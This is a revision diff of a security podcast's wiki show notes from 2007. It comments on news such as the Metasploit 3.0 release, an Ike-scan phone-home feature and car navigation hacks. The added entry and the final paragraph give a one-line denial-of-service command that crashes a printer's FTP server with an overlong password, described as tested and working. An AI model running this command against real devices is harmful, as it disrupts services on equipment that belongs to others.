Difference between revisions of "Episode65"

From Security Weekly Wiki
Jump to navigationJump to search
Line 8: Line 8:
  
 
[http://www.darkreading.com/document.asp?doc_id=120516&f_src=darkreading_section_296 Metasploit 3.0 Released] - [PaulDotCom] - I've been playing with 3.0 for quite some time and am glad to see it officially released.  I now agree with the decision to move towards ruby, and with LORCON supporting ruby, it is now next on my list to pickup as a language.
 
[http://www.darkreading.com/document.asp?doc_id=120516&f_src=darkreading_section_296 Metasploit 3.0 Released] - [PaulDotCom] - I've been playing with 3.0 for quite some time and am glad to see it officially released.  I now agree with the decision to move towards ruby, and with LORCON supporting ruby, it is now next on my list to pickup as a language.
 +
 +
[http://securityvulns.com/Qdocument500.html More printer hacking fun] - [PaulDotCom] - I tested this one and it works, crashed the ftp server on a printer.  The exploit?  try this: '''python /usr/lib/python2.3/ftplib.py -d [printer IP]  -l -p `python -c 'print "A"*300'`'''

Revision as of 17:07, 29 March 2007

VoIP Security Tools - [PaulDotCom] - A good collection of resources for VoIP security, which is really another dimension that we, as security professionals, now need to deal with. It can't be ignored anymore...

Ike-scan 1.8 Information Seepage - [PaulDotCom] - Remember when we talked about this tool? Well, Raul informed us that there was a phone home feature, we told cutaway about it, and he volunteered to document and research it and did a fantastic job! He even got the scoop from the vendor, who has since removed the feature. I think its important to send the message that we are watching for this stuff and you will be outed if you tool phones home.

HACKING LOLZ - [PaulDotCom] - From the dark reading room article...

Hacking Car Nav Systems - [PaulDotCom] - "hacker Daniele Bianco built tools that let an attacker inject fake messages to the navigation system, or launch a denial-of-service attack." HOT, come to butthead... " cause a denial-of-service (DOS) attack, which could crash not only a car's navigation system, but its climate control system, and stereo, too, he says." Okay, or, I send you to the middle on nowhere in the winter, turn off your heat, and blast "Feeling' Hot, Hot, Hot!".

Metasploit 3.0 Released - [PaulDotCom] - I've been playing with 3.0 for quite some time and am glad to see it officially released. I now agree with the decision to move towards ruby, and with LORCON supporting ruby, it is now next on my list to pickup as a language.

More printer hacking fun - [PaulDotCom] - I tested this one and it works, crashed the ftp server on a printer. The exploit? try this: python /usr/lib/python2.3/ftplib.py -d [printer IP] -l -p `python -c 'print "A"*300'`